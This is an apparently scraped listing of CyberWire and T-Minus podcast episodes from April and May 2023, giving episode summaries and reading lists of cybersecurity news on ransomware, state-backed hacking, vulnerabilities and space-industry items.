U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Five Eyes disrupt FSB’s Snake malware. From DDoS to cryptojacking. Ransomware trends. Yesterday’s Patch Tuesday is in the books. May 10, 2023

The Five Eyes disrupt Russia’s FSB Snake cyberespionage infrastructure. Shifting gears: from DDoS to cryptojacking. Trends in ransomware. Our guest is Steve Benton from Anomali with insights on potential industry headwinds. Ann Johnson from Afternoon Cyber Tea speaks with Roland Cloutier about risk and resilience in the modern era. And yesterday’s Patch Tuesday is now in the books, including a work-around for a patch from this past March.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/90

Selected reading.

Patch Tuesday notes. (The CyberWire)

U.S. Agencies and Allies Partner to Identify Russian Snake Malware Infrastructure Worldwide (US National Security Agency)

Hunting Russian Intelligence “Snake” Malware (Joint Cybersecurity Advisory)

RapperBot DDoS Botnet Expands into Cryptojacking (Fortinet)

The State of Ransomware 2023 (Sophos)

From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API (Akamai)

Windows MSHTML Platform Security Feature Bypass Vulnerability (Microsoft)

State-sponsored and state-promoted cyber campaigns. A look at Royal ransomware. A new wave of BEC. Man-in-the-middle attacks rising. May 09, 2023

An analysis of Royal ransomware. PaperCut vulnerability detection methods can be bypassed. Man-in-the-middle phishing attacks are on the rise. A new wave of BEC attacks from an unexpected source. Thomas Etheridge from CrowdStrike, has the latest threat landscape trends. Our guest is Dan Amiga of Island with insights on the enterprise browser category. And a look into recent Russian cyberattacks against Ukraine.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/89

Selected reading.

Threat Assessment: Royal Ransomware (Unit 42)

PaperCut Exploitation - A Different Path to Code Execution (VulnCheck)

New PaperCut RCE exploit created that bypasses existing detections (Bleeping Computer)

Man-in-the-Middle (MitM) attacks reaching inboxes increase 35% since 2022 (Cofense)

Exploring the Rise of Israel-Based BEC Attacks (Abnormal Security)

Russians launch mass cyber attack on online service for queueing to cross border by trucks (Ukrainska Pravda)

Reverting UAC-0006: Mass distribution of SmokeLoader using the "accounts" theme (CERT-UA#6613) (CERT-UA)

Developments in the ransomware underworld: ALPHV, Akira, Cactus, and Royal. Some organizations remain vulnerable to problems with unpatched Go-Anywhere instances. May 08, 2023

ALPHV claims responsibility for a cyberattack on Constellation Software. A new Akira ransomware campaign spreads. CACTUS is a new ransomware leveraging VPNs to infiltrate its target. Many organizations are still vulnerable to the Go-Anywhere MFT vulnerability. Russian hacktivists interfere with the French Senate's website. Keith Mularski from EY, details their "State of the Hack" report. Emily Austin from Censys discusses the State of the Internet. And ransomware gangs target local governments in Texas and California.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/88

Selected reading.

ALPHV gang claims ransomware attack on Constellation Software (BleepingComputer)

Constellation Software hit by cyber attack, some personal information stolen (IT World Canada)

Press Release of Constellation Software Inc. (GlobeNewswire News Room)

Meet Akira — A new ransomware operation targeting the enterprise (BleepingComputer)

New Cactus ransomware encrypts itself to evade antivirus (BleepingComputer)

Pro-Russian Hackers Claim Downing of French Senate Website (SecurityWeek)

Dallas cyberattack highlights ransomware’s risks to public safety, health (Washington Post)

Hacked: Dallas Ransomware Attack Disrupts City Services (Dallas Observer)

City of Dallas Continues Battling Ransomware Attack for Third Day (NBC 5 Dallas-Fort Worth)

San Bernardino County pays hackers $1.1 million ransom after cyber attack (Victorville Daily Press)

San Bernardino County pays $1.1M ransom after cyberattack disrupts Sheriff's Department systems (ABC7 Los Angeles)

Atomic Data devastated by the unexpected death of CEO and co-owner Jim Wolford (Atomic Data)

Shelley Ma: The mystery behind cybersecurity. [Response Lead] [Career Notes] May 07, 2023

Shelley Ma, Incident Response Lead at Coalition sits down to share her story, starting all the way back when she was a kid and fell in love with playing the game "NeoPets" that ended up paving the way for her future in cybersecurity. After starting this journey, she shares how she became intrigued with crime and mystery shows, which ultimately spawned an interest in forensic science. She ended up signing up for an internship program that she was able to get into, which she says was a pivotal change for her that provided her the chance to begin her career. She shares the advice that if anyone is looking to get into this career, she highly recommends looking into the career before beginning. Following some advise given to her by a professor and mentor, she says that telling the truth helps her deal with adversity in the workplace. Shelley says "In our industry, there are so many opportunities for our opinions and testimonies to be coerced and swayed. I refuse to do that and every time I come back to what my professor said, if you don't want to spend the rest of your life looking over your shoulders, just simply tell the truth." We thank Shelley for sharing her story with us.

Phishing campaign takes the energy out of Chinese nuclear industry. [Research Saturday] May 06, 2023

Ryan Robinson from Intezer to discuss his team's work on "Phishing Campaign Targets Chinese Nuclear Energy Industry." The research team discovered activity targeting the nuclear energy industry in China. Researchers attributed the activity to Bitter APT, a South Asian APT that is known to target the energy, manufacturing and government sectors, mainly in Pakistan, China, Bangladesh, and Saudi Arabia.

The article states "We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China. In some emails, people and entities in academia are also targeted, also related to nuclear energy." By luring recipients in, invites them to join conferences on subjects that are relevant to them, they are then able to social engineer the victims.

The research can be found here:

Phishing Campaign Targets Chinese Nuclear Energy Industry

DPRK's Kimsuki spearphishes. A standards strategy for AI. Ransomware Task Force retrospective. KillNet's new menu. Ex Uber CSO sentenced for data breach cover-up. May 05, 2023

Kimsuki has a new reconnaissance tool. The Biden administration shares plans for AI. Reports on the ransomware taskforce report. KillNet recommits to turning a profit. Deepen Desai from Zscaler has the latest stats on Phishing. Our guest is Karen Worstell from VMware with a conversation about inclusivity. And the former CSO at Uber is sentenced.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/87

Selected reading.

Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign (SentinelOne)

Ransomware Task Force Gaining Ground - May 2023 Progress Report (Ransomware Task Force)

Influential task force takes stock of progress against ransomware (Washington Post)

For Money and Attention: Killnet Apparently Reorganizes Again (Flashpoint)

Killnet Ostracizes Leader of Anonymous Russia, Adding New Chapter to Pro-Kremlin Hacktivist Drama (Flashpoint)

Former Uber CSO Joe Sullivan Avoids Prison Time Over Data Breach Cover-Up (Security Week)

Former Uber security chief Sullivan avoids prison in data breach case (Washington Post)

Cyberespionage, straight out of Beijing, Teheran, and Moscow. Developments in the criminal underworld. Indictment in a dark web carder case. May 04, 2023

An APT41 subgroup uses new techniques to bypass security products. Iranian cyberespionage group MuddyWater is using Managed Service Provider tools. Wipers reappear in Ukrainian networks. Meta observes and disrupts the new NodeStealer malware campaign. The City of Dallas is moderately affected by a ransomware attack. My conversation with Karin Voodla, part of the US State Department’s Cyber fellowship program. Lesley Carhart from Dragos shares Real World Stories of Incident Response and Threat Intelligence. And there’s been an indictment and a takedown in a major dark web carder case.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/86

Selected reading.

Attack on Security Titans: Earth Longzhi Returns With New Tricks (Trend Micro)

APT groups muddying the waters for MSPs (ESET)

Russian hackers use WinRAR to wipe Ukraine state agency’s data (BleepingComputer)

WinRAR as a "cyberweapon". Destructive cyberattack UAC-0165 (probably Sandworm) on the public sector of Ukraine using RoarBat (CERT-UA#6550) (CERT-UA)

The malware threat landscape: NodeStealer, DuckTail, and more (Engineering at Meta)

Facebook disrupts new NodeStealer information-stealing malware (BleepingComputer)

NodeStealer Malware Targets Gmail, Outlook, Facebook Credentials (Decipher)

City of Dallas likely targeted in ransomware attack, city official says (Dallas News)

Cybercriminal Network Fueling the Global Stolen Credit Card Trade is Dismantled (US Department of Justice)

Secret Service, State Department Offer Up To $10 Million Dollar Reward For Information On Wanted International Fugitive (US Secret Service)

Police dismantles Try2Check credit card verifier used by dark web markets (BleepingComputer)

Iran integrates influence and cyber operations. ChatGPT use and misuse. Trends in the cyber underworld. Hybrid warfare and cyber insurance war clauses. May 03, 2023

Iran integrates influence and cyber operations. ChatGPT use and misuse. Phishing reports increased significantly so far in 2023, while HTML attacks double. An update on the Discord Papers. Cyberstrikes against civilian targets. My conversation with our own Simone Petrella on emerging cyber workforce strategies. Tim Starks from the Washington Post joins me with reflections on the RSA conference. And, turns out, a war clause cannot be invoked in denying damage claims in the NotPetya attacks (at least not in the Garden State).

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/85

Selected reading.

Rinse and repeat: Iran accelerates its cyber influence operations worldwide (Microsoft On the Issues)

ChatGPT Confirms Data Breach, Raising Security Concerns (Security Intelligence)

Samsung Bans Generative AI Use by Staff After ChatGPT Data Leak (Bloomberg)

Malicious email campaigns abusing Telegram bots rise tremendously in Q1 2023, surpassing all of 2022 by 310% (Cofense)

Threat Spotlight: Proportion of malicious HTML attachments doubles within a year (Barracuda)

Zelensky says White House told him nothing about Discord intelligence leaks (Washington Post)

Russia attacks civilian infrastructure in cyberspace just as it does on ground - watchdog (Ukrinform)

Merck’s Insurers On the Hook in $1.4 Billion NotPetya Attack, Court Says (Wall Street Journal)

Merck entitled to $1.4B in cyberattack case after court rejects insurers' 'warlike action' claim (Fierce Pharma)

From cryptostealers to CCTV exploits, from Magecart enhancements to coronation phishbait, cybercriminals have been active. (But so have law enforcement agencies.) May 02, 2023

LOBSHOT is a cryptowallet stealer abusing Google Ads. Coronation phishbait. A known CCTV vulnerability is currently being exploited. T-Mobile discloses another, smaller data breach. New Magecart exploits. Preliminary lessons from cyber operations during Russia's war. Rob Boyce from Accenture shares insights from RSA Conference. Our special guest is NSA Director of Cybersecurity Rob Joyce. And Europol announces a major dark web market takedown.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/84

Selected reading.

New LOBSHOT malware gives hackers hidden VNC access to Windows devices (BleepingComputer)

New 'Lobshot' hVNC Malware Used by Russian Cybercriminals (SecurityWeek)

Elastic Security Labs discovers the LOBSHOT malware (Elastic Blog)

Researchers see surge in scam websites linked to coronation (Computer Weekly)

TBK DVR Authentication Bypass Attack (FortiGuard)

T-Mobile discloses second data breach since the start of 2023 (BleepingComputer)

T-Mobile discloses 2nd data breach of 2023, this one leaking account PINs and more (Ars Technica)

T-Mobile Announces Another Data Breach (CNET)

Magecart threat actor rolls out convincing modal forms (Malwarebytes)

Cyber lessons from Ukraine: Prepare for prolonged conflict, not a knockout blow (Breaking Defense)

288 dark web vendors arrested in major marketplace seizure (Europol)

FDA warns of biomed device vulnerability. Ransomware's effects continue at US Marshals Service fugitive tracking. US DoJ shifts to disruption of cybercrime. GRU phishing. KillNet’s ask-me-anything. May 01, 2023

The FDA warns of a vulnerability affecting biomedical devices. Ransomware's effects continue to trouble the US Marshals Service. The US Justice Department shifts how it deals with large scale cybercrime. Fresh phish from the GRU. Caleb Barlow looks at unicorns and zombiecorns. Our guest Manoj Sharma from Symantec explains the differences between Zero Trust and SASE. And KillNet runs an ask-me-anything session.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/83

Selected reading.

Illumina cyber vulnerability may present risks for patient results (U.S. Food and Drug Administration)

CISA, FDA warn of new Illumina DNA device vulnerability (Record

Key law enforcement computers still down 10 weeks after breach (Washington Post)

Feds Prioritizing Disruptions Over Arrests in Cyberattack Cases (PCMAG)

"Ashamed" LockBit ransomware gang apologises to hacked school, offers free decryption tool (Hot for Security)

APT28 cyberattack: distribution of emails with "instructions" on "updating the operating system" (CERT-UA#6562) (CERT-UA)

Hackers use fake ‘Windows Update’ guides to target Ukrainian govt (BleepingComputer)

Ukraine at D+431: Drone strikes and phishing expeditions. (CyberWire)

Perry Carpenter: Turning composition into computing. [Strategy] [Career Notes] Apr 30, 2023

Perry Carpenter, Chief Evangelist and Strategy Officer at KnowBe4 and host of the 8th Layer Insights podcast, sits down to share his story trying different paths, before ultimately switching over to the cyber industry. After trying to go down the paths of music and law and finding neither were what he wanted to do, he decided to take an internship to get more into computer programming. That led him to getting his first job. After his first job, he moved onto other big name companies like Walmart, Alltel, and Gartner, and landing finally with KnowBe4. He compares his work to working with music, when he initially wanted to begin making music early in his career. He says "I think for me, when it was the kind of the connection between music and computing is that whenever you're kind of joining things together or at a, a musical scale to make chords, or whenever you're adding different, um, instruments and octaves together or timbers together to get some kind of bigger result." We thank Perry for sharing his story.

HinataBot focuses on DDoS attack. [Research Saturday] Apr 29, 2023

This week our guests are, Larry Cashdollar, Chad Seaman and Allen West from Akamai Technologies, and they are discussing their research on "Uncovering HinataBot: A Deep Dive into a Go-Based Threat." The team discovered a new Go-based, DDoS-focused botnet. They found it was named after the popular anime show "Naruto," they are calling it "HinataBot"

In the research it says "HinataBot was seen being distributed during the first three months of 2023 and is actively being updated by the authors/operators." Akamai was able to get a deep look into the malware works by using a combination of reverse engineering the malware and imitating the command and control (C2) server.

The research can be found here:

Uncovering HinataBot: A Deep Dive into a Go-Based Threat

What’s now being traded in the C2C markets. CISA would like comments on its software self-attestation form. And in Russia’s hybrid war, are there cyber war crimes, or real hacktivists? Apr 28, 2023

Cl0p and LockBit exploit PaperCut vulnerability in ransomware campaigns. Infostealer traded in the C2C market. All ads are trying to get your money, but some just take it. CISA requests comment on software self-attestation form. Our guest is Marcin Kleczynski, CEO of Malwarebytes, sharing thoughts on the current threat landscape, attacks on students and academic institutions. Betsy Carmelite from Booz Allen, discussing themes from the RSAC tied into critical infrastructure resilience. Ukraine argues that cyberattacks against civilian infrastructure should be classified as war crimes. And are there any genuine disinterested hacktivists on Russia's side, or are they all fronts?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/82

Selected reading.

Microsoft Confirms PaperCut Servers Used to Deliver LockBit and Cl0p Ransomware (The Hacker News)

Microsoft: Clop and LockBit ransomware behind PaperCut server hacks (BleepingComputer)

New 'Atomic macOS Stealer' Malware Offered for $1,000 Per Month (SecurityWeek)

“Malverposting” — With Over 500K Estimated Infections, Facebook Ads Fuel This Evolving Stealer… (Guardio)

Request for Comment on Secure Software Self-Attestation Common Form (CISA)

OMB, CISA set to release common form for software self-attestation (FCW)

Pro-Russian hacktivism isn’t real, top Ukrainian cyber official says (CyberScoop)

Pro-Russian hacktivism isn't real, top Ukrainian cyber official says (CyberScoop)

Waging lawfare against criminal infrastructure. Notes from the cyber underworld. Hybrid war, and cyber ops across the spectrum of conflict. And what do the bots want? (Hint: kicks.) Apr 27, 2023

Google targets CryptBot malware infrastructure. FIN7 attacked Veeam servers to steal credentials. Ransomware-as-a-service offering threatens Linux systems. Evasive Panda targets NGOs in China. Anonymous Sudan is active against targets in Israel. Russian ransomware operations aim at disrupting supply chains into Ukraine. Our guest is Stuart McClure, CEO of Qwiet AI. Microsoft’s Ann Johnson stops by with her take on the RSA conference. And bots want new kicks.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/81

Selected reading.

Continuing our work to hold cybercriminal ecosystems accountable (Google)

Google Disrupts Massive CryptBot Malware Operation (Decipher)

Google disrupts malware that steals sensitive data from Chrome users (TechCrunch)

FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability (SecurityWeek)

RTM Locker Ransomware as a Service (RaaS) Now on Linux (Uptycs)

Evasive Panda APT group delivers malware via updates for popular Chinese software (WeLiveSecurity)

NSA sees 'significant' Russian intel gathering on European, U.S. supply chain entities (CyberScoop)

Ukraine at D+427: Russian cyberattacks and disinformation before Ukraine's spring offensive. (CyberWire)

Releasing leak suspect a national security risk, feds say (AP NEWS)

Pentagon leak suspect may still have access to classified info, court filings allege (the Guardian)

Netacea Quarterly Index: Top 5 Scalper Bot Targets of Q1 2023 (Netacea)

BellaCiao from Tehran; PingPull from Beijing: two cyberespionage tools. SLP exploitation. Ransomware as an international threat. The state of hacktivism. Digital evidence or war crimes. Apr 26, 2023

BellaCiao is malware from Iran's IRGC, while PingPull is malware used by the Chinese government affiliated Tarus Group. Ransomware continues to be a pervasive international threat. An overview of hacktivism. Our guest is CyberMindz founder Peter Coroneos, discussing the importance of mental health in cybersecurity. Johannes Ullrich shares insights from his RSAC panel discussions. And Ukraine continues to collect evidence of Russian war crimes.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/80

Selected reading.

Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware (Bitdefender Blog)

Chinese Alloy Taurus Updates PingPull Malware (Unit 42)

Abuse of the Service Location Protocol May Lead to DoS Attacks (Cybersecurity and Infrastructure Security Agency CISA)

#RSAC: Ransomware Poses Growing Threat to Five Eyes Nations (Infosecurity Magazine)

Hacktivism Unveiled, April 2023 Insights into the footprints of hacktivists (Radware)

FBI aiding Ukraine in collection of digital and physical war crime evidence (CyberScoop)

BlackCat follows Cl0p to GoAnywhere. Mirai gets an upgrade. Deterring cyber war. Homeland Secrity’s cyber priorities. Action against DPRK cryptocrooks. What KillNet’s up to. Apr 25, 2023

BlackCat (ALPHV) follows Cl0p, exploiting the GoAnywhere MFA vulnerability. The Mirai botnet exploits a vulnerability disclosed at Pwn2Own. An RSAC presentation describes US response to Russian prewar and wartime cyber operations. The US Department of Homeland Security outlines cyber priorities. Andrea Little Limbago from Interos shares insights from her RSAC 2023 panels. US indicts, sanctions DPRK operators in crypto-laundering campaign. Our guest is Marc van Zadelhoff, CEO of Devo, with insights from the conference. And the latest on KillNet.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/79

Selected reading.

BlackCat Ransomware Group Exploits GoAnywhere Vulnerability (At-Bay)

Zero Day Initiative — TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal (Zero Day Initiative)

Years after discovery of SolarWinds breach, Russian hackers could be struggling (Washington Post)

U.S. deploys more cyber forces abroad to help fight hackers (Reuters)

DHS Outlines Cyber Priorities in Release of Delayed Review (Nextgov.com)

US sanctions supporters of North Korean hackers, Iranian cyberspace head (Record)

North Korean Foreign Trade Bank Rep Charged for Role in Two Crypto Laundering Conspiracies (Department of Justice. U.S. Attorney's Office District of Columbia)

Treasury Targets Actors Facilitating Illicit DPRK Financial Activity in Support of Weapons Programs (U.S. Department of the Treasury)

Supply-chain attack's effects spread. CISA makes new KEV entries. Bumblebee malware loader describes. Decoy Dog toolset discovered. Discord Papers were shared earlier and more widely. Apr 24, 2023

3CX is not the only victim in the recent supply chain attack. The PaperCut critical vulnerability is under active exploitation. The Bumblebee malware loader is buzzing around in the wild. A new unique malware toolkit called Decoy Dog. Rick Howard, CSO from N2K Networks, shares RSA Conference predictions and talks about his new book, "Cybersecurity First Principles." Our guest Theresa Lanowitz from AT&T Cybersecurity shares insights on Securing the Edge. And the alleged Discord Papers leaker shared earlier and more widely than previously known.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/78

Selected reading.

3CX Hackers Also Compromised Critical Infrastructure Firms (Infosecurity Magazine)

That 3CX supply chain attack keeps getting worse (Register)

Energy sector orgs in US, Europe hit by same supply chain attack as 3CX (Record)

Even more victims found in complex 3CX supply chain attack (CybersecurityConnect)

X_Trader Supply Chain Attack Affects Critical Infrastructure Organizations in U.S. and Europe (Symantec Enterprise Blogs)

URGENT | PaperCut MF/NG vulnerability bulletin (March 2023) (PaperCut)

PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise (Horizon3.ai)

Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers (The Hacker News)

CISA KEV Breakdown | April 21, 2023 (Nucleus Security)

CISA Adds Three Known Exploited Vulnerabilities to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug (The Hacker News)

CISA adds printer bug, Chrome zero-day and ChatGPT issue to exploited vulnerabilities catalog (Record)

Bumblebee Malware Distributed Via Trojanized Installer Downloads (Secureworks).

Google ads push BumbleBee malware used by ransomware gangs (BleepingComputer)

Bumblebee malware infects victims via fake Zoom, Cisco and ChatGPT software installers (Record)

Decoy Dog malware toolkit found after analyzing 70 billion DNS queries (BleepingComputer)

Analyzing DNS Traffic for Anomalous Domains and Threat Detection (Infoblox Blog)

Airman Shared Sensitive Intelligence More Widely and for Longer Than Previously Known (New York Times)

FBI leak investigators home in on members of private Discord server (Washington Post)

From Discord to 4chan: The Improbable Journey of a US Intelligence Leak (bellingcat)

Europe’s Planes Keep Flying Despite Cyberattack (Wall Street Journal)

Master Gunnery Sergeant Scott Stalker from US Space Command: goals and risks in the digital space operating environment. Apr 23, 2023

T-Minus Deep Space Guest

Scott Stalker, Command Senior Enlisted Leader at US Space Command, shares how the combatant command is adapting to new challenges in the digital era of space operations, new operational concepts, and building the force to deter aggression.

You can follow US Space Command on LinkedIn and Twitter, and you can follow MGySgt Scott Stalker on LinkedIn.

Remember to leave us a 5-star rating and review in your favorite podcast app.

Miss an episode? Sign-up for our weekly intelligence briefing, Signals and Space, and you’ll never miss a beat.

Audience Survey

We want to hear from you! Please complete our wicked fast 4 question survey. It’ll help us get better and deliver you the most mission-critical space intel every day.

Want to hear your company in the show?

You too can reach the most influential leaders in the industry. Here’s a link to our media kit. Contact us at space@n2k.com to request more info about sponsoring T-Minus.

Want to join us for an interview?

Please send your interview pitch to space-editor@n2k.com and include your name, affiliation, and topic proposal, and our editor will get back to you for scheduling.

Maria Varmazis: Combining cyber and space. [Space] [Career Notes] Apr 23, 2023

Maria Varmazis, N2K's Space Correspondent and host of N2K's newest podcast T-Minus, sits down to share her journey on combining her two passions of space and cyber. Maria grew up wanting to be an astronomer, in school she focused on joining anything with technology and enjoyed the classes that made her think. After transferring to a new college, she went into journalism, absolutely falling in love with the new career path she had made for herself. She got herself a job at Sophos and that's where she learned about cybersecurity. Now she discusses cyber and space in her new podcast, combining her two passions into one for all to understand. Maria discusses some of the setbacks she overcame in this industry and shares the wise advice of "I would never pretend that failure isn't painful, but it is an incredible teaching tool. So if you feel like you've had a huge career fail or a really big misstep, you can still pivot from that and you can make that into something." We thank Maria for sharing her story with us.

Don't let the Elon Musk crypto giveaway scam swindle you. [Research Saturday] Apr 22, 2023

Shiran Guez from Akamai sits down with Dave to discuss their research on "Chatbots, Celebrities, and Victim Retargeting and Why Crypto Giveaway Scams Are Still So Successful." Researchers at Akamai have been on the lookout for crypto giveaway scams. These scams have been impersonating celebrities and brands, most notably Elon Musk and his associated companies.

The research states "the scams are delivered through various social media platforms as well as direct messaging apps such as WhatsApp or Telegram." These scams have helped add to the existing damages that exceed $1 billion caused by crypto fraud.

The research can be found here:

Chatbots, Celebrities, and Victim Retargeting: Why Crypto Giveaway Scams Are Still So Successful

Daggerfly swarms African telco. EvilExtractor described. Patriotic hacktivism in East Asia. Updates on Russia's hybrid war suggest that cyber warfare has some distinctive challenges. Apr 21, 2023

Daggerfly APT targets an African telecommunications provider. EvilExtractor is an alleged teaching tool apparently gone bad. A Chinese speaking threat group is active against Taiwan and South Korea. Europe’s air traffic control is under attack. Cecilia Marinier from RSAC and Barmak Meftah, a judge of ISB, discuss the RSA innovation sandbox. Awais Rashid from University of Bristol on the cybersecurity of smart farming. Forget about those evil maids. What about these evil sys admins?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/77

Selected reading.

Daggerfly: APT Actor Targets Telecoms Company in Africa (Symantec)

EvilExtractor – All-in-One Stealer (Fortinet Blog)

Chinese-language threat group targeted a dozen South Korean institutions (Record)

Xiaoqiying/Genesis Day Threat Actor Group Targets South Korea, Taiwan (Recorded Future)

WSJ News Exclusive | Europe’s Air-Traffic Agency Under Attack From Pro-Russian Hackers (Wall Street Journal)

Intelligence Leaks Cast Spotlight on a Recurring Insider Threat: Tech Support (Wall Street Journal)

Russia’s invasion of Ukraine is also being fought in cyberspace (Atlantic Council)

CFP European Cybersecurity Seminar 2023-2024 (European Cyber Conflict Research Initiative)

#CYBERUK23: Russian Cyber Offensive Exhibits ‘Unprecedented’ Speed and Agility (Infosecurity Magazine)

Two-step supply-chain attack. Plugging leaks, in both Mother Russia and the Land of the Free and the Home of the Brave. Belarus remains a player in the cyber war. Apr 20, 2023

The 3CX compromise involved a two-stage supply-chain attack. Impersonating ChatGPT. Russia's security organs say they're cracking down on leaks. Updates on the Discord Papers case. Belarus arrests a pro-Russian hacktivist. Rob Boyce from Accenture Security on Dark Web cyber criminals targeting CRM systems. Our guest is Mike Loewy from the Tide Foundation, with an innovative approach to distributed key security. And, is Minsk going wobbly on Moscow?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/76

Selected reading.

3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise; Suspected North Korean Actor Responsible (Mandiant)

ChatGPT-Themed Scam Attacks Are on the Rise (Palo Alto Networks Unit 42)

Russian Offensive Campaign Assessment, April 19, 2023 (Institute for the Study of War)

Belarus-linked hacking group targets Poland with new disinformation campaign (Record)

Killnet Ostracizes Leader of Anonymous Russia, Adding New Chapter to Pro-Kremlin Hacktivist Drama (Flashpoint)

Belarus-linked hacking group targets Poland with new disinformation campaign (Record)

CISA Alert AA23-108A – APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers. Apr 20, 2023

The UK National Cyber Security Centre (NCSC), NSA, CISA, and FBI are releasing this joint advisory to provide TTPs associated with APT28’s exploitation of Cisco routers in 2021.

AA23-108A Alert, Technical Details, and Mitigations

Malware Analysis Report

Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Play ransomware's new tools. A look at what the GRU’s been up to. US Air Force opens investigation into alleged leaker's Air National Guard wing. KillNet’s new hacker course: “Dark School.” Apr 19, 2023

Play ransomware's new tools. Fancy Bear is out and about. Updates on Sandworm. Ransomware in Russia's war against Ukraine. The US Air Force opens an investigation into the alleged leaker's Air National Guard wing. The Washington Post’s Tim Starks joins us with insights on the Biden administration's attempts to better secure the water supply. Carole Theriault chats with Cisco Talos' Vanja Svacjer about the threat landscape, now and tomorrow. And KillNet’s in the education business with a new hacker course: “Dark School.”

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/75

Selected reading.

Play Ransomware Group Using New Custom Data-Gathering Tools (Symantec)

NCSC-UK, NSA, and Partners Advise about APT28 Exploitation of Cisco Routers (National Security Agency/Central Security Service)

APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers (NCSC)

State-sponsored campaigns target global network infrastructure (Cisco Talos Blog)

Ukraine remains Russia’s biggest cyber focus in 2023 (Google)

Fog of War: How the Ukraine Conflict Transformed the Cyber Threat Landscape (Google Threat Analysis Group)

M-Trends 2023: Cybersecurity Insights From the Frontlines (Mandiant)

Faltering against Ukraine, Russian hackers resort to ransomware: Researchers (Breaking Defense)

Air Force unit in document leaks case loses intel mission (AP NEWS)

Pentagon Details Review of Policies for Handling Classified Information (New York Times)

Ukraine at D+419: GRU cyber ops scrutinized. (CyberWire)

A Symposium, a wet dress, a new fund, and it’s only Monday. [T-Minus Space Daily] Apr 19, 2023

Brace yourselves, it’s Space Symposium week! Wet dress rehearsal for Starship. UK launches the International Bilateral Fund. Orbit Fab gets a series A round. Boeing announces their anti-jam payload for WGS. The FAA wants to balance air travel and space travel. Our interview with Steve Luczynski, Board Chair of the Aerospace Village, on their mission, programs, and upcoming activities at the RSA Conference next week. All this and more.

Remember to leave us a 5-star rating and review in your favorite podcast app.

Miss an episode? Sign-up for our weekly intelligence briefing, Signals and Space, and you’ll never miss a beat.

T-Minus Guest

Our featured guest is Steve Luczynski, Board Chair of the Aerospace Village, on the Aerospace Village nonprofit, their mission, their programs, and their upcoming activities at the RSA Conference next week.

You can follow Steve on LinkedIn and Twitter.

Selected Reading

SpaceX's launch of Starship could remake space exploration | Washington Post

UK Space Agency funding for international space partnerships | GOV.UK.

SpaceX launches seventh Transporter rideshare mission | SpaceNews

Exolaunch’s 21 rideshare smallsats deployed during the SpaceX Transporter-7 mission | SatNews

HawkEye 360’s nexgen Cluster 7 smallsats are successfully launched | SatNews

TrustPoint Announces Launch of First Commercially-Funded, Purpose-Built PNT Microsatellite | Business Wire

China claims its Space Station has achieved 100% oxygen regeneration in orbit | Interesting Engineering

Boeing Unveils Anti-Jam Payload For Next Space Force Wideband Global SATCOM Satellite | Via Satellite

As counterspace weapons ‘proliferate,’ the new cold war for space races forward: studies | Breaking Defense

The Moon is the Best Place to Transport Rocket Fuel | Universe Today

US aviation authorities may delay some space launches to avoid air traffic disruption | Reuters

NASA launches stadium-sized balloon from New Zealand | SpaceConnect

Audience Survey

We want to hear from you! Please complete our wicked fast 4 question survey. It’ll help us get better and deliver you the most mission-critical space intel every day.

Want to hear your company in the show?

